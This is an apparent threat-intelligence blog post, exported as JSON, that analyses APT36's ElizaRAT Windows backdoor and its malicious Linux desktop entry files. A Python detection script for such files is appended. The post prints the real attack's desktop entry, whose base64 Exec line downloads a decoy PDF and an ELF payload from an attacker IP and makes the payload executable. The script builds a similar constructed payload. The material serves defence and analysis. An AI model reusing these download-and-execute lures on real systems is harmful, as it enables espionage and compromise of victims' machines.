{"id":1145,"date":"2023-09-18T07:53:01","date_gmt":"2023-09-18T07:53:01","guid":{"rendered":"https:\/\/jacksonholdingcompany.com\/a-peek-into-apt36s-updated-arsenal-sudeep-singh\/"},"modified":"2023-09-18T07:53:01","modified_gmt":"2023-09-18T07:53:01","slug":"a-peek-into-apt36s-updated-arsenal-sudeep-singh","status":"publish","type":"post","link":"https:\/\/jacksonholdingcompany.com\/a-peek-into-apt36s-updated-arsenal-sudeep-singh\/","title":{"rendered":"A peek into APT36’s updated arsenal Sudeep Singh"},"content":{"rendered":"

Introduction

In July 2023, Zscaler ThreatLabz discovered new malicious activity perpetrated by the Pakistan-based advanced persistent threat group APT36. APT36 is a sophisticated cyber threat group with a history of conducting targeted espionage operations in South Asia. We observed APT36 targeting Indian government sectors using a previously undocumented Windows RAT, new cyber espionage utilities for Linux, new distribution mechanisms, and a new attack vector used against the Linux environment.

In this blog, we examine the latest tools employed by APT36, which are designed to target both Windows and Linux operating systems.

- Key Takeaways
- Brief Overview
- Analysis of ElizaRAT, the New Windows RAT
- Malicious Linux Desktop Entry Files as New Attack Vectors
- New Python-Based Cyber Espionage Utilities Targeting Linux
- Threat Attribution
- Threat Actor Infrastructure
- Conclusion
- Zscaler Coverage
- MITRE ATT&CK TTP Mapping
- Indicators of Compromise (IOCs)

Key Takeaways

- Updated arsenal of APT36: The threat actor has resurfaced with a fresh, fully functional Windows remote administration tool (RAT), novel tools for cyber espionage on Linux systems, innovative distribution methods, and additional attack vectors.
- New Windows RAT: A custom RAT, referred to as ElizaRAT, has been incorporated into the APT36 toolkit. ElizaRAT is delivered as a .NET binary and establishes a C2 communication channel via Telegram, enabling threat actors to exert complete control over the targeted endpoint.
- Abuse of legitimate services: Legitimate services, such as Google Drive and Telegram, are abused in different stages of the attack chain.
- New attack vectors for Linux: APT36 now boasts innovative weaponization of Linux desktop configuration files that target Linux-based endpoints in the Indian government sector.
- Deceptive tactics: The threat actor took extensive measures to conceal any link to Pakistan. They chose the infrastructure and artifacts meticulously to make it appear as though the activities were conducted in India.
- Reuse of infrastructure: In some cases, the same C2 infrastructure is being used by APT36 for both credential phishing attacks and distributing malicious binaries.

Brief Overview

APT36 is an advanced persistent threat (APT) group which we attribute to Pakistan with very high confidence. This group has been active since 2013 and primarily targets the Indian government, defense, and education sectors.

This group leverages credential harvesting and malware distribution attacks to conduct cyber espionage. APT36 utilizes:

- Custom-built remote administration tools targeting Windows
- Lightweight Python-compiled cyber espionage tools, each serving a specific purpose, targeting Windows and Linux
- Weaponized open-source C2 frameworks like Mythic
- Trojanized installers of Indian government applications like KAVACH multi-factor authentication
- Trojanized Android apps
- Credential phishing sites targeting Indian government officials

Analysis of ElizaRAT, the New Windows RAT

We assigned the moniker "ElizaRAT" to this new Windows-based backdoor utilized by APT36 due to the distinctive strings identified within the commands observed during our real-time analysis of the C2 communication channel.

ElizaRAT is distributed as .NET binaries sent inside password-protected archive files hosted on Google Drive links. During our threat analysis, we gathered several samples of ElizaRAT, and they all shared these characteristics:

- They are all .NET binaries that are compiled as Control Panel applets (CPL) and use the ".cpl" file extension. To the best of our knowledge, this is the first time APT36 has weaponized the CPL file format.
- The binaries are large, ranging from 4 MB to 16 MB.
- The Costura .NET framework was used to embed the essential .NET assemblies inside the main malware, which inflated the binary sizes.
- The Telegram API was used for C2 communication.

For this technical analysis, we use the following file metadata:

- MD5 hash: fc99daa2e1b47bae4be51e5e59aef1f0
- Filename: AgendaMeeting.cpl

Since this Windows RAT arrives on the endpoint in the form of a Control Panel applet, the first method called upon execution is CplApplet().

This method transfers control to Program().Main(), which in turn invokes an asynchronous task, MainAsync(). All important malicious operations are carried out inside this task.

The image below shows Program().Main() kick-starting the malicious activities on the endpoint.

Figure 1: The MainAsync() method used to start the malicious activities on the endpoint.

Some of the key operations performed by ElizaRAT are:

- Initializes the Telegram bot with Communicate.ConnectMe() using the built-in Telegram bot token and sets it up in polling mode to receive commands from the threat actor.
- Creates a directory: %appdata%\TextSource
- Generates a UUID and username specific to the infected machine.
- Drops and displays a decoy PDF file to the user.
- Sets up persistence on the machine.
- Fetches details on antivirus software running on the machine and sends the information to the attacker-controlled Telegram bot.

In the following sections, we dive deeper into some of these operations.

Logging Operation

Each execution result is logged on both the endpoint (client-side) and the Telegram bot (server-side).

The code below shows that logging is done at both the local and the remote level:

    // remote logging in Telegram bot
    await Communication.send_message("Username Created with name : " + TextSource.Settings._username);
    // local logging on the infected endpoint
    File.AppendAllText(TextSource.Settings.log_p, "username created local\n");

Unique Identifier Generation

A UUID and username are generated for each infected machine so that the threat actor can uniquely identify the victim. The RAT uses Windows Management Instrumentation (WMI) to fetch the processorID and UUID of the machine, and uses both of these values to derive a UUID and username specific to the infected machine.

The only difference between the generated UUID and the username is the ".cookie" extension: the username is the UUID without the ".cookie" extension.

The image below shows the relevant code used to generate these values.

Figure 2: The getusername() method used to generate the UUID and username to identify the infected machine.

C2 Command Format

Since the threat actor uses the same Telegram bot to manage multiple infected endpoints, they use a specific C2 command format to synchronize the operations and ensure that a given command executes only on the intended endpoint.

The C2 command format looks like this:

    <command>*<username>*<arguments>

C2 Commands

All C2 commands are handled in a switch-case statement by the Bot_OnMessage() method inside the Communicate class. Before the execution of any command, the RAT extracts the username from the C2 command and compares it with the infected machine's username. The command is executed only if both values match.

The following C2 commands are supported by the bot:

Table 1: C2 commands supported by the Telegram bot

C2 COMMAND    FUNCTIONALITY
/dir          Fetches the list of files in the specified directory.
/upload       Uploads the specified file from the victim's machine.
/getprocess   Gets the list of processes running on the victim's machine. The list is returned in a file named getproc.dll.
/run          Executes the specified program on the victim's machine.
/delete       Deletes the specified file.
/end          Kills the specified processes on the victim's machine.
/online       Checks whether the infected machine is online.
/identity     Connects to the specified website from the victim's machine and sends the response to the threat actor. This can be used to fetch the machine's IP address by supplying a parameter like hxxps://api.ipify[.]org.
/ping         Checks internet connectivity from the victim's machine to the specified website.
/scr          Takes a screenshot of the victim's machine and sends it to the threat actor in a file named scr.dll.
/createdir    Creates a directory on the user's machine.

Persistence

In order to achieve persistence on the infected machine, the bot creates a Windows shortcut file (LNK) in the Windows Startup directory.

The image below shows the code used to create this shortcut file. The name of the shortcut file is fetched from the "orig_name" setting defined in the config. In this case, the shortcut file is called TextSource.lnk.

Figure 3: The buildforts() method used to create a Windows shortcut file in the Startup directory for persistence.

The description of this shortcut file is set to "Text Editing APP for Windows" to disguise it as a text editing application and make it seem innocuous. In addition, the target command line is set to execute the Control Panel applet using rundll32.

Displaying Decoy Content

The method dosome() defined in the Program class is responsible for displaying the decoy PDF file to the user. This decoy file is present inside the resources section of the .NET binary.

The image below shows the decoy file. It is only used to distract the victim and make it appear that an error occurred when opening the file.

Figure 4: Decoy PDF file displayed to the user.

Malicious Linux Desktop Entry Files as New Attack Vectors

The use of Linux desktop entry files by APT36 as an attack vector has never been documented before. This attack vector is fairly new and appears to be used in very low-volume attacks. So far, our research team has discovered three samples, all of which have zero detections on VirusTotal.

We first observed an occurrence in May 2023, when a credential phishing website used to target Indian government employees was also found to be hosting a redirector to distribute ZIP archives containing malicious Linux desktop entry files.

National Informatics Center (NIC), India Phishing Attack – May 2023

In May 2023, we discovered a credential phishing site, email9ov[.]in, targeting Indian government officials by masquerading as the official login portal for the National Informatics Center (NIC), India. We notified NIC in May 2023 about this website and the associated threat intel.

We also noticed that the same phishing website was using the hxxps://email9ov[.]in/VISIT_OF_MEDICAL URL to redirect visitors to the hxxp://103.2.232[.]82:8081/Tri-Service-Exercise/Delegation_Saudi_Arabia.zip URL.

From there, a visitor would download a ZIP archive containing a maliciously crafted Linux desktop entry file.

Here are some technical details about this case:

- ZIP archive MD5 hash: 9c66f8c0c970822985600bed04e56434
- ZIP filename: Delegation_Saudi_Arabia.zip
- Desktop entry file MD5 hash: f27a4968af4ed64baef8e086516e86ac
- Desktop entry filename: Delegation_Saudi_Arabia.desktop

Desktop entry file analysis

We found the following content in the desktop entry file:

    [Desktop Entry]
    Encoding=UTF-8
    Name=Delegation_Saudi_Arabia.pdf
    Exec=sh -c "echo 'L3Vzci9iaW4vd2dldCAnaHR0cDovLzEwMy4yLjIzMi44Mjo4MDgxL1R
    yaS1TZXJ2aWNlLUV4ZXJjaXNlL0RlbGVnYXRpb25fU2F1ZGlfQXJhYmlhLnBkZicgLU8g
    L3RtcC9EZWxlZ2F0aW9uX1NhdWRpX0FyYWJpYS5wZGY7IC91c3IvYmluL3dnZXQgJ2
    h0dHA6Ly8xMDMuMi4yMzIuODI6ODA4MS9JU0VQQy0xMi0yMDIzLUFnZW5kYS1mb3It
    bWVldGluZy8xODUnIC1PIC90bXAvMTg1LmVsZjsgY2QgL3RtcDsgY2htb2QgK3ggMTg1
    LmVsZjtsaWJyZW9mZmljZSAvdG1wL0RlbGVnYXRpb25fU2F1ZGlfQXJhYmlhLn
    BkZiB8IC4vMTg1LmVsZg==' sh"
    Terminal=false
    Type=Application
    Icon=x-office-document

The icon of this desktop entry file is set to "x-office-document" so that it looks like an innocent Office document.

The base64-encoded command present inside the desktop entry file decodes to:

    /usr/bin/wget 'hxxp://103.2.232[.]82:8081/Tri-Service-Exercise/Delegation_Saudi_Arabia.pdf' -O /tmp/Delegation_Saudi_Arabia.pdf; /usr/bin/wget 'hxxp://103.2.232[.]82:8081/ISEPC-12-2023-Agenda-for-meeting/185' -O /tmp/185.elf; cd /tmp; chmod +x 185.elf;libreoffice /tmp/Delegation_Saudi_Arabia.pdf
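As an added example (not part of the original post, and not Zscaler's tooling), the following Python script triages .desktop files for the traits described above: an Exec= line wrapped in sh -c, a long base64 token that decodes to a shell command, download-then-chmod behaviour in the decoded command, and a document-style Name or Icon on a Type=Application entry. The two sample entries, the host example.invalid and the indicator labels are constructed for this example; the real sample's hashes and URLs are not used.

```python
"""Static triage of Linux desktop entry (.desktop) files (added example).

Flags the traits seen in the APT36 desktop entry: an Exec= line wrapped in
"sh -c", a base64 blob that decodes to a shell command, download-then-chmod
behaviour, and a document-style Name or Icon on a Type=Application entry.
Indicator labels are our own; the sample entries below are constructed.
"""
import base64
import configparser
import re
import sys
from typing import Dict, List

DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt")
DOC_ICONS = {"x-office-document", "application-pdf", "x-office-spreadsheet",
             "x-office-presentation"}
SHELL_WRAPPER = re.compile(r"\b(?:sh|bash|dash|zsh)\s+-c\b")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")
DOWNLOADER = re.compile(r"\b(?:wget|curl)\b")
MAKE_EXEC = re.compile(r"\bchmod\s+(?:\+x|[0-7]{3,4})\b")


def parse_desktop_entry(text: str) -> Dict[str, str]:
    """Return the key/value pairs of the [Desktop Entry] group."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",), strict=False)
    cp.optionxform = str  # keep key case (Exec, Name, Type)
    cp.read_string(text)
    if "Desktop Entry" not in cp:
        raise ValueError("no [Desktop Entry] group")
    return dict(cp["Desktop Entry"])


def decode_base64_blobs(text: str) -> List[str]:
    """Decode every long base64 token in text that yields printable text."""
    decoded = []
    for token in B64_TOKEN.findall(text):
        try:
            raw = base64.b64decode(token, validate=True)
        except ValueError:  # binascii.Error is a ValueError
            continue
        as_text = raw.decode("utf-8", errors="replace")
        if all(c.isprintable() or c.isspace() for c in as_text):
            decoded.append(as_text)
    return decoded


def triage(entry: Dict[str, str]) -> List[str]:
    """Return the indicator labels found in one parsed desktop entry."""
    findings = []
    name, icon, exec_line = entry.get("Name", ""), entry.get("Icon", ""), entry.get("Exec", "")
    # A launcher that presents itself as a document is the lure pattern.
    if entry.get("Type") == "Application" and (
            name.lower().endswith(DOC_EXTENSIONS) or icon in DOC_ICONS):
        findings.append("document-masquerade")
    if SHELL_WRAPPER.search(exec_line):
        findings.append("shell-wrapper")
    blobs = decode_base64_blobs(exec_line)
    if blobs:
        findings.append("base64-payload")
    # Judge the command the system would actually run: Exec plus whatever it decodes.
    effective = "\n".join([exec_line] + blobs)
    if DOWNLOADER.search(effective) and MAKE_EXEC.search(effective):
        findings.append("download-and-execute")
    return findings


def triage_text(text: str) -> List[str]:
    return triage(parse_desktop_entry(text))


# Constructed benign launcher.
BENIGN_ENTRY = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=accessories-text-editor
Terminal=false
"""

# Constructed stage-two command; example.invalid is a reserved name that never resolves.
CONSTRUCTED_CMD = (
    "/usr/bin/wget 'http://example.invalid/decoy.pdf' -O /tmp/decoy.pdf; "
    "/usr/bin/wget 'http://example.invalid/stage2' -O /tmp/stage2.elf; "
    "cd /tmp; chmod +x stage2.elf; xdg-open /tmp/decoy.pdf | ./stage2.elf"
)
CONSTRUCTED_BLOB = base64.b64encode(CONSTRUCTED_CMD.encode()).decode()
SUSPICIOUS_ENTRY = f"""[Desktop Entry]
Encoding=UTF-8
Name=Delegation_Agenda.pdf
Exec=sh -c "echo '{CONSTRUCTED_BLOB}' | base64 -d | sh"
Terminal=false
Type=Application
Icon=x-office-document
"""

if __name__ == "__main__":
    if sys.argv[1:]:  # usage: python triage_desktop.py file.desktop ...
        for path in sys.argv[1:]:
            with open(path, encoding="utf-8", errors="replace") as fh:
                print(path, triage_text(fh.read()))
    else:
        print("benign    ", triage_text(BENIGN_ENTRY))
        print("suspicious", triage_text(SUSPICIOUS_ENTRY))
```

Run without arguments to see both constructed samples scored, or pass .desktop paths (for example from ~/.local/share/applications, ~/Desktop or extracted mail attachments) to triage real files. Decoding the base64 before matching matters: the wget and chmod strings are absent from the raw Exec= line, so a signature on the visible text alone would miss the sample.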
